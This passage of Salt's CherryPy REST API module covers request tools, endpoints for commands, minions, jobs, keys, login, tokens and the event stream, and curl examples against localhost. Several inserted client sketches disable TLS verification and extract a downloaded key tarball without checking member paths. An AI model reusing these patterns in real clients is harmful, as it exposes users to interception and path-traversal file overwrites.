cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and isinstance(data, collections.Mapping):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
tools_config = {
'on_start_resource': [
('html_override', html_override_tool),
('salt_token', salt_token_tool),
],
'before_request_body': [
('cors_tool', cors_tool),
('salt_auth', salt_auth_tool),
('hypermedia_in', hypermedia_in),
],
'before_handler': [
('lowdata_fmt', lowdata_fmt),
('hypermedia_out', hypermedia_out),
('salt_ip_verify', salt_ip_verify_tool),
],
}
for hook, tool_list in tools_config.items():
for idx, tool_config in enumerate(tool_list):
tool_name, tool_fn = tool_config
setattr(cherrypy.tools, tool_name, cherrypy.Tool(
hook, tool_fn, priority=(50 + idx)))
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.salt_token.on': True,
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
@cherrypy.config(**{'tools.sessions.on': False})
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: http
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
'''
import inspect
return {
'return': "Welcome",
'clients': salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
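# Hedged usage sketch (not part of the upstream Salt source): how an HTTP
# client might exercise the LowDataAdapter endpoint above. The host,
# credentials, and eauth backend are illustrative assumptions, and the
# third-party ``requests`` library is assumed to be available client-side.
def _example_lowstate_client(base_url='https://localhost:8000',
                             username='saltdev', password='saltdev',
                             eauth='pam'):
    import requests  # assumption: not a dependency of this module
    session = requests.Session()
    # POST /login mints a salt-api session token tied to a Salt eauth token.
    session.post('{0}/login'.format(base_url),
                 json={'username': username,
                       'password': password,
                       'eauth': eauth},
                 verify=False)
    # Subsequent lowstate POSTs to / reuse the session cookie set by /login.
    response = session.post(base_url,
                            json=[{'client': 'local',
                                   'tgt': '*',
                                   'fun': 'test.ping'}],
                            headers={'Accept': 'application/json'},
                            verify=False)
    return response.json()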
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: http
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: http
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: http
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
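# Hedged usage sketch (not part of the upstream Salt source): dispatch an
# asynchronous job through /minions and follow the ``_links`` entries in the
# 202 response to poll /jobs/<jid>. ``session`` is assumed to be an
# authenticated requests.Session such as the one built in
# _example_lowstate_client() above.
def _example_async_job(session, base_url='https://localhost:8000'):
    resp = session.post('{0}/minions'.format(base_url),
                        json=[{'tgt': '*', 'fun': 'test.ping'}],
                        headers={'Accept': 'application/json'},
                        verify=False)
    results = []
    for link in resp.json().get('_links', {}).get('jobs', []):
        job = session.get(base_url + link['href'],
                          headers={'Accept': 'application/json'},
                          verify=False)
        results.append(job.json())
    return results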
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def GET(self, jid=None, timeout=''):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: http
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: http
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = {'client': 'runner'}
if jid:
lowstate.update({'fun': 'jobs.list_job', 'jid': jid})
else:
lowstate.update({'fun': 'jobs.list_jobs'})
cherrypy.request.lowstate = [lowstate]
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
ret['info'] = [job_ret_info[0]]
minion_ret = {}
returns = job_ret_info[0].get('Result')
for minion in returns:
if u'return' in returns[minion]:
minion_ret[minion] = returns[minion].get(u'return')
else:
minion_ret[minion] = returns[minion].get('return')
ret['return'] = [minion_ret]
else:
ret['return'] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
'''
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: http
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: http
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
@cherrypy.config(**{'tools.hypermedia_out.on': False, 'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
        <salt.wheel.key.gen_accept>` function.
.. note:: A note about ``curl``
Avoid using the ``-i`` flag or HTTP headers will be written and
produce an invalid tar file.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: http
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
lowstate = cherrypy.request.lowstate
lowstate[0].update({
'client': 'wheel',
'fun': 'key.gen_accept',
})
if 'mid' in lowstate[0]:
lowstate[0]['id_'] = lowstate[0].pop('mid')
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
        # Build the tarball in memory. Use bytes throughout so this works on
        # both Python 2 and Python 3 (tarfile writes binary data).
        pub_key = ret.get('pub', '').encode('utf-8')
        pub_key_file = tarfile.TarInfo('minion.pub')
        pub_key_file.size = len(pub_key)
        priv_key = ret.get('priv', '').encode('utf-8')
        priv_key_file = tarfile.TarInfo('minion.pem')
        priv_key_file.size = len(priv_key)
        fileobj = six.BytesIO()
        tarball = tarfile.open(fileobj=fileobj, mode='w')
        tarball.addfile(pub_key_file, six.BytesIO(pub_key))
        tarball.addfile(priv_key_file, six.BytesIO(priv_key))
        tarball.close()
        headers = cherrypy.response.headers
        headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(lowstate[0]['id_'])
        headers['Content-Type'] = 'application/x-tar'
        headers['Content-Length'] = len(fileobj.getvalue())
        headers['Cache-Control'] = 'no-cache'
        fileobj.seek(0)
        return fileobj
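# Hedged usage sketch (not part of the upstream Salt source): unpack the tar
# archive returned by the /keys POST handler above. ``requests``, the
# credentials, and the destination directory are illustrative assumptions;
# the member names minion.pub / minion.pem come from the handler itself.
def _example_fetch_keys(base_url='https://localhost:8000', mid='jerry',
                        username='saltdev', password='saltdev', eauth='pam',
                        dest='/etc/salt/pki/minion'):
    import io
    import requests  # assumption: not a dependency of this module
    resp = requests.post('{0}/keys'.format(base_url),
                         data={'mid': mid, 'username': username,
                               'password': password, 'eauth': eauth},
                         verify=False)
    with tarfile.open(fileobj=io.BytesIO(resp.content), mode='r') as tarball:
        tarball.extractall(dest)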
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: http
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning(
'Salt Master is not available.')
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get('username', None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
if token['eauth'] == 'django' and '^model' in eauth:
perms = token['auth_list']
else:
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token['name'], [])
perms.extend(eauth.get('*', []))
if 'groups' in token and token['groups']:
user_groups = set(token['groups'])
eauth_groups = set([i.rstrip('%') for i in eauth.keys() if i.endswith('%')])
for group in user_groups & eauth_groups:
perms.extend(eauth['{0}%'.format(group)])
if not perms:
logger.debug("Eauth permission list not found.")
except Exception:
logger.debug("Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'."
.format(token.get('eauth'), token.get('name')), exc_info=True)
perms = None
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms or {},
}]}
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Token(LowDataAdapter):
'''
Generate a Salt token from eauth credentials
Wraps functionality in the :py:mod:`auth Runner <salt.runners.auth>`.
.. versionadded:: 2017.7.0
'''
@cherrypy.config(**{'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
.. http:post:: /token
Generate a Salt eauth token
:status 200: |200|
:status 400: |400|
:status 401: |401|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/token \
-H 'Content-type: application/json' \
-d '{
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}'
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
[{
"start": 1494987445.528182,
"token": "e72ca1655d05...",
"expire": 1495030645.528183,
"name": "saltdev",
"eauth": "auto"
}]
'''
for creds in cherrypy.request.lowstate:
try:
creds.update({
'client': 'runner',
'fun': 'auth.mk_token',
'kwarg': {
'username': creds['username'],
'password': creds['password'],
'eauth': creds['eauth'],
},
})
except KeyError:
raise cherrypy.HTTPError(400,
'Require "username", "password", and "eauth" params')
return list(self.exec_lowstate())
class Run(LowDataAdapter):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
    salt-api does not enforce authorization; Salt's eauth system does that.
Local/Runner/WheelClient all accept ``username``/``password``/``eauth``
**or** ``token`` kwargs that are then checked by the eauth system. The
session mechanism in ``rest_cherrypy`` simply pairs a session with a Salt
eauth token and then passes the ``token`` kwarg in automatically.
If you already have a Salt eauth token, perhaps generated by the
:py:func:`mk_token <salt.runners.auth.mk_token>` function in the Auth
Runner module, then there is no reason to use sessions.
This endpoint accepts either a ``username``, ``password``, ``eauth`` trio,
**or** a ``token`` kwarg and does not make use of sessions at all.
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>` Other than that this URL is identical to the
:py:meth:`root URL (/) <LowDataAdapter.POST>`.
.. http:post:: /run
An array of :term:`lowstate` data describing Salt commands must be
sent in the request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
**Or** using a Salt Eauth token:
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"token": "<salt eauth token here>"
}]'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
        The /run endpoint can also be used to issue commands using the salt-ssh
subsystem.
        When using salt-ssh, eauth credentials should not be supplied. Instead,
authentication should be handled by the SSH layer itself. The use of
the salt-ssh client does not require a salt master to be running.
Instead, only a roster file must be present in the salt configuration
directory.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: http
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
'''
return {
'return': list(self.exec_lowstate()),
}
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
'''
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
'''
if auth_token is None:
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get('token', auth_token)
# The eauth system does not currently support perms for the event
        # stream, so we're just checking that the token exists, not whether
        # the token allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: http
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
        clients to only watch for certain tags without having to deserialize the
JSON object each time.
.. code-block:: http
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.log(saltEvent.tag, saltEvent.data);
};
Note, the SSE stream is fast and completely asynchronous and Salt is
very fast. If a job is created using a regular POST request, it is
possible that the job return will be available on the SSE stream before
the response for the POST request arrives. It is important to take that
asynchronicity into account when designing an application. Below are
some general guidelines.
* Subscribe to the SSE stream _before_ creating any events.
* Process SSE events directly as they arrive and don't wait for any
other process to "complete" first (like an ajax request).
* Keep a buffer of events if the event stream must be used for
synchronous lookups.
* Be cautious in writing Salt's event stream directly to the DOM. It is
very busy and can quickly overwhelm the memory allocated to a
browser tab.
        A full, working proof-of-concept JavaScript application is available
:blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
It can be viewed by pointing a browser at the ``/app`` endpoint in a
running ``rest_cherrypy`` instance.
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
cookies = cherrypy.request.cookie
auth_token = token or salt_token or (
cookies['session_id'].value if 'session_id' in cookies else None)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
yield str('retry: 400\n') # future lint: disable=blacklisted-function
while True:
data = next(stream)
yield str('tag: {0}\n').format(data.get('tag', '')) # future lint: disable=blacklisted-function
yield str('data: {0}\n\n').format(salt.utils.json.dumps(data)) # future lint: disable=blacklisted-function
return listen()
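# Hedged usage sketch (not part of the upstream Salt source): a minimal Python
# consumer for the SSE stream served by Events.GET above, mirroring the curl
# and JavaScript examples in the docstring. The token value and the use of
# ``requests`` are illustrative assumptions.
def _example_consume_events(base_url='https://localhost:8000', token='308650d'):
    import json
    import requests  # assumption: not a dependency of this module
    resp = requests.get('{0}/events?token={1}'.format(base_url, token),
                        stream=True, verify=False)
    for line in resp.iter_lines():
        # Records are "tag: ..." / "data: ..." pairs separated by blank lines;
        # only the data lines carry the JSON event payload.
        if line.startswith(b'data: '):
            yield json.loads(line[len(b'data: '):].decode('utf-8'))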
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
